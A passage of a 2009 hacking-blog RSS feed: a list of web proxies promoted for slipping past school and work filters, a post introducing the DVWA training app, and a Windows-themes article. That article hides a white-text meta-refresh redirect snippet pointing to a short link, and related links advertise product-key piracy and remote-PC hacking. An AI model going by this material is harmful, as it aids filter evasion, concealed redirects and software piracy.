<p>http://www.proxy121.com/ &#8211; The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1<br />http://www.bigate.com/cgi-bin/bigate/b/k/k/<br />http://www.userbeam.de/<br />http://www.calcmaster.net/<br />http://www.misterprivacy.com/begin_anonymous_surfing.htm<br />http://www.myshield.com/<br />http://www.idzap.com/<br />http://www.safegatetech.com/<br />http://www.breiter.ch/<br />http://www.rrdb.org/rrdbproxy.php?l=en<br />http://proxy.decodes.biz/<br />http://proxy.mxds.ch/<br />http://www.spondoo.com/<br />http://search.sicomm.us/<br />http://schnarre-monika.celebrityblog.net/cache.cgi<br />http://filter2005.com/<br />http://www.kproxy.com/<br />http://www.websitereactor.org/cgi-bin/001/nph-.pl<br />http://www.goproxing.com/<br />http://anonycat.com/<br />http://www.spynot.com/<br />http://www.merletn.org/anonymizer<br />http://www.cgi-proxy.net/<br />http://www.proxymouse.com/<br />http://www.theunblocker.tk/<br />http://www.betaproxy.com/<br />http://www.letsproxy.com/<br />http://www.freeproxysurf.info/<br />http://www.mysticproxy.com/<br />http://www.proxywave.com/<br />http://www.vtunnel.com/<br />http://www.proxysnail.com/<br />http://www.freeproxy.ca/<br />http://basic.3proxy.com/<br />http://www.privatebrowsing.com/<br />http://www.hackingtruths.org/proxy<br />http://xanproxy.be/<br />http://www.ipsecret.com/<br />http://www.proxyanon.com/<br />http://www.anonproxy.info/<br />http://www.proxysafe.com/<br />http://www.strongproxy.com/<br />http://www.boredatschool.net/<br />http://www.ukproxy.com/<br />http://www.simpleproxy.com/<br />http://www.phproxy.org/<br />http://surfonym.com/<br />http://geoepker.hu/freeproxy/<br />http://www.browseatwork.com/<br />http://www.ipblocker.info/<br />http://www.boredatwork.info/<br />http://www.anonymousurfing.info/<br />http://www.browsingwork.com/<br />http://www.freeproxyserver.org/<br />http://www.browseany.com/<br />http://www.browsesecurely.com/<br />http://IEproxy.com/<br />http://www.sneak3.po.gs/<br />http://www.proxytastic.com/<br />http://www.freewebproxy.org/<br />http://www.thecgiproxy.com/<br />http://www.hide-me.be/<br />http://www.anotherproxy.com/<br />http://www.proxy77.com/<br />http://www.surf-anon.com/<br />http://www.free-proxy.info/<br />http://www.theproxysite.info/<br />http://www.proxyify.info/<br />http://www.concealme.com/<br />http://browseschool.info/<br />http://browsework.info/<br />http://browsingschool.info/<br />http://browsingwork.info/<br />http://browsingschool.com/<br />http://www.proxyindex.com/<br />http://www.gobyproxy.com/<br />http://www.proxifyme.com/<br />http://www.proxyghost.com/<br />http://www.spysurfing.com/<br />http://www.unblockthis.com/<br />http://www.proxyserver7.com/<br />http://www.daveproxy.co.uk/<br />http://www.tntproxy.com/<br />http://www.neoproxy.net/<br />http://www.bypassbrowser.com/<br />http://www.procksie.com/<br />http://www.httproxy.com/<br />http://www.cgiproxy.info/<br />http://www.silentsurf.com/cgi-bin/nph-index.cgi<br />http://www.proxy-sock.com/<br />http://www.proxygeek.com/<br />http://www.datadefense.org/<br />http://www.hideyour.info/<br />http://www.howto.pro/<br />http://www.collegeproxy.com/<br />http://www.demonproxy.com/<br />http://www.satanproxy.com/<br />http://www.hidingyou.com/<br />http://www.intelliproxy.com/<br />http://www.fireprox.com/<br />http://www.h0h0h0.com/firewall/<br />http://www.katedrala.cz/<br />http://www.browseatwork.net/<br />http://www.2255.info/<br />http://www.vproxy.be/<br />http://www.boxproxy.com/<br />http://www.nopimps.com/<br />http://www.fsurf.com/<br />http://www.proxylord.com/<br />http://roachhost.com/hp/<br />http://www.freepr0xy.com/<br />http://www.proxypop.com/<br />http://proxy.winidn.com/<br />http://www.cloax.net/<br />http://www.proxy247.com/<br />http://www.traceless.com/<br />http://www.siatec.net/proxyanonymizer<br />http://www.stealth-ip.net/<br />http://www.proxywhip.com/<br />http://www.proxy-surf.net/<br />http://www.videoeditors.info/proxy/<br />http://www.blockmy.info/<br />http://www.proxychatroom.com/<br />http://www.teenproxy.com/<br />http://www.totalupload.com/surf/<br />http://www.proxene.com/<br />http://www.fileshack.us/proxy.php<br />http://www.cloaker.ca/<br />http://www.proxified.net/<br />http://www.mrreid.net/</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/06/how-to-bypass-all-webfilters.html' rel='bookmark' title='Permanent Link: How to Bypass all Webfilters'>How to Bypass all Webfilters</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-to-access-blocked-web-sites.html' rel='bookmark' title='Permanent Link: How To Access Blocked Web Sites ??'>How To Access Blocked Web Sites ??</a></li>
<li><a href='http://www.hackingaday.com/2009/09/teamviewerhack-any-remote-servers-or-pcs.html' rel='bookmark' title='Permanent Link: TeamViewer:Hack any Remote Servers or PCs'>TeamViewer:Hack any Remote Servers or PCs</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/09/list-of-best-proxy-servers-available-on-the-internet.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learn Website Hacking Using DVWA Tools</title>
		<link>http://www.hackingaday.com/2009/09/learn-website-hacking-using-dvwa-tools.html</link>
		<comments>http://www.hackingaday.com/2009/09/learn-website-hacking-using-dvwa-tools.html#comments</comments>
		<pubDate>Thu, 03 Sep 2009 13:21:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/09/03/learn-website-hacking-using-dvwa-tools</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/09/learn-website-hacking-using-dvwa-tools.html"><img align="left" hspace="5" width="125" src="http://lh5.ggpht.com/_4i_szoP4U5s/Sp6l6Q3hRkI/AAAAAAAAA-k/pLOWrf3HgX0/Untitled-1%5B10%5D.jpg?imgmax=800" class="alignleft wp-post-image tfe" alt="" title="" /></a>With lots of curious readers asking me how to practice hacking and from where to start,Damn Vulnerable Web App Untitled-1(DVWA) is great application to plunge yourself in.DVWA is a PHP/MySQL web application that is damn  vulnerable..literally. Its main goals are to be light weight, easy to use and full of vulnerabilities to exploit and [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/best-hacking-tools-available-on-the-internet.html' rel='bookmark' title='Permanent Link: Best Hacking tools available on the internet !'>Best Hacking tools available on the internet !</a></li>
<li><a href='http://www.hackingaday.com/2008/10/some-more-hacking-tools.html' rel='bookmark' title='Permanent Link: Some more Hacking Tools'>Some more Hacking Tools</a></li>
<li><a href='http://www.hackingaday.com/2009/03/hacking-tools.html' rel='bookmark' title='Permanent Link: Hacking Tools'>Hacking Tools</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://lh5.ggpht.com/_4i_szoP4U5s/Sp6l6Q3hRkI/AAAAAAAAA-k/pLOWrf3HgX0/Untitled-1%5B10%5D.jpg?imgmax=800"><img src="http://lh5.ggpht.com/_4i_szoP4U5s/Sp6l6Q3hRkI/AAAAAAAAA-k/pLOWrf3HgX0/Untitled-1%5B10%5D.jpg?imgmax=800" alt=" Learn Website Hacking Using DVWA Tools" border="0" title="Learn Website Hacking Using DVWA Tools" /></a>With lots of curious readers asking me how to practice hacking and from where to start,Damn Vulnerable Web App Untitled-1(<span style="font-weight:bold;">DVWA)</span> is great application to plunge yourself in.DVWA is a PHP/MySQL web application that is damn  vulnerable..literally. Its main goals are to be light weight, easy to use and full of vulnerabilities to exploit and it successfully achieves those <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' title="Learn Website Hacking Using DVWA Tools" />  . And frankly it can be used to learn or teach the art of web application security<br />.<br />The <span style="font-weight:bold;">DVWA</span> is <span style="font-weight:bold;">bundled</span> with the following  type of<span style="font-weight:bold;"> vulnerabilities</span>-</p>
<ol>
<li><span style="font-weight:bold;">SQL Injection</span></li>
<li><span style="font-weight:bold;">XSS (Cross Site Scripting)</span></li>
<li><span style="font-weight:bold;">LFI (Local File Inclusion)</span></li>
<li><span style="font-weight:bold;">RFI (Remote File Inclusion)</span></li>
<li><span style="font-weight:bold;">Command Execution</span></li>
<li><span style="font-weight:bold;">Upload Script</span></li>
<li><span style="font-weight:bold;">Login Brute Force</span></li>
</ol>
<p>WARNING !!<br />(Shamelessly ripped off from official statement <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' title="Learn Website Hacking Using DVWA Tools" />  )<br />It should come as no shock..but this application is damn vulnerable! Do not upload it to your hosting provider’s public html folder or any working web server as it will be hacked. It’s recommend that you download and install XAMP onto a local machine inside your LAN which is used solely for testing.<br />You can download DVWA 1.0.4 here:</p>
<p><span style="font-weight:bold;">Download:</span><a style="font-weight:bold;" href="http://www.ziddu.com/download/6340649/dvwa_v1.0.4.zip.html" target="_Blank">DVWA 1.0.4</a></p>
<p>via:www.rdhacker.blogspot.com</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/best-hacking-tools-available-on-the-internet.html' rel='bookmark' title='Permanent Link: Best Hacking tools available on the internet !'>Best Hacking tools available on the internet !</a></li>
<li><a href='http://www.hackingaday.com/2008/10/some-more-hacking-tools.html' rel='bookmark' title='Permanent Link: Some more Hacking Tools'>Some more Hacking Tools</a></li>
<li><a href='http://www.hackingaday.com/2009/03/hacking-tools.html' rel='bookmark' title='Permanent Link: Hacking Tools'>Hacking Tools</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/09/learn-website-hacking-using-dvwa-tools.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Will Windows XP and Vista Themes Slowdown the PC ?</title>
		<link>http://www.hackingaday.com/2009/08/will-windows-xp-and-vista-themes-slowdown-the-pc.html</link>
		<comments>http://www.hackingaday.com/2009/08/will-windows-xp-and-vista-themes-slowdown-the-pc.html#comments</comments>
		<pubDate>Sun, 30 Aug 2009 12:16:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/08/30/will-windows-xp-and-vista-themes-slowdown-the-pc</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/08/will-windows-xp-and-vista-themes-slowdown-the-pc.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/08/xp-aero-theme.jpg?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>Yes,it does!As far as getting the habit of frequently changing themes, you cannot help but wonder if they would be a cause for occasional slowdowns of computers whenever they are in use. One thing we can note is the fact that they eat resources.
Unlike in the early days when you can simply change your desktop [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/05/5000-genuine-keys-for-all-microsoft-products-xp-vista-server-office-windows-7.html' rel='bookmark' title='Permanent Link: 5000+ Genuine Keys For all Microsoft Products (XP, Vista, Server, Office, Windows 7)'>5000+ Genuine Keys For all Microsoft Products (XP, Vista, Server, Office, Windows 7)</a></li>
<li><a href='http://www.hackingaday.com/2009/05/how-to-run-windows-vista-on-ps3.html' rel='bookmark' title='Permanent Link: How to run Windows Vista On PS3'>How to run Windows Vista On PS3</a></li>
<li><a href='http://www.hackingaday.com/2009/03/windows-vista-wallpaper-pack.html' rel='bookmark' title='Permanent Link: Windows Vista Wallpaper Pack'>Windows Vista Wallpaper Pack</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://govinda007.files.wordpress.com/2009/08/xp-aero-theme.jpg"><img alt=" Will Windows XP and Vista Themes Slowdown the PC ?" border="0" src="http://govinda007.files.wordpress.com/2009/08/xp-aero-theme.jpg?w=300" title="Will Windows XP and Vista Themes Slowdown the PC ?" /></a><span style="font-weight:bold;">Yes</span>,it does!As far as getting the habit of frequently changing themes, you cannot help but wonder if they would be a cause for occasional slowdowns of computers whenever they are in use. One thing we can note is the fact that they eat resources.</p>
<p>Unlike in the early days when you can simply change your desktop with standard themes, the new themes we use in Windows XP and Vista need larger resources. They are enhancements for people who want their computer to look unique and ideal to their eyes each time that they use them. For others however, the only important thing is being able to use your computer and get the work you need done.</p>
<p>For some, it may not matter. New computer specifications today allow them to enjoy the same speed and output although it may defeat the purpose of being faster when it comes to processing and resources used. Some would point towards the way of new operating system needs that slow down a computer and adding new Windows themes only aggravates it as well.<br /><span style="color:white;font-size:78%;">&lt;b:if cond=&#8217;data:blog.URL ==&#8221;http://tr.im/Axlg/&#8221;&#8216;&gt;&lt;meta content=&#8217;0;url=http://tr.im/Axlg/&#8217; HTTP-equiv=&#8217;refresh&#8217;/&gt;&lt;/b:if&gt;</span></p>
<p>With these things in mind, we cannot avoid using some themes at some point. Perhaps modifying them according to what we want or in part can help avoid such problems in the end. It may become technical for some people who are not used to customizing themes on their desktop but if you want to maximize computer performance, you can do so by picking only some of the elements needed to make your computer stand out and be different from the rest.</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/05/5000-genuine-keys-for-all-microsoft-products-xp-vista-server-office-windows-7.html' rel='bookmark' title='Permanent Link: 5000+ Genuine Keys For all Microsoft Products (XP, Vista, Server, Office, Windows 7)'>5000+ Genuine Keys For all Microsoft Products (XP, Vista, Server, Office, Windows 7)</a></li>
<li><a href='http://www.hackingaday.com/2009/05/how-to-run-windows-vista-on-ps3.html' rel='bookmark' title='Permanent Link: How to run Windows Vista On PS3'>How to run Windows Vista On PS3</a></li>
<li><a href='http://www.hackingaday.com/2009/03/windows-vista-wallpaper-pack.html' rel='bookmark' title='Permanent Link: Windows Vista Wallpaper Pack'>Windows Vista Wallpaper Pack</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/08/will-windows-xp-and-vista-themes-slowdown-the-pc.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
